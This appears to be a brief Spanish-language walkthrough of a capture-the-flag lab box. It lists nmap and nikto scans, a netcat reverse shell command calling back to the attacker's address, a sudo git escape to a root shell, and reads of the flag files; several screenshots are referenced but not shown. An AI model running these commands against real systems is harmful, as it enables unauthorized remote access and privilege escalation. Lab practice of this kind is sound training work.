nmap -A -p- -oA uc404 192.168.198.109 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA uc404 192.168.198.109

nmap -sU -O -p- -oA uc404-udp 192.168.198.109

nikto -h 192.168.198.109 :80

Pasted image 20211101115843.png

Pasted image 20211101115959.png

Metemos este comando de curl en la consola

Pasted image 20211102074612.png

Metemos este comando de curl en la consola usando un script de reverse shell.

Pasted image 20211102074644.png

Para conseguir un reverse shell ejecutamos lo siguiente:

nc 192.168.49.77 2049 -e /bin/bash

https://gtfobins.github.io/gtfobins/git/#sudo

sudo -l

sudo git -p help config

!/bin/sh

cat /var/www/local.txt

cat /root/proof.txt

Pasted image 20211102075343.png

boxes

copyright©2022 Cu3rv0x all rights reserved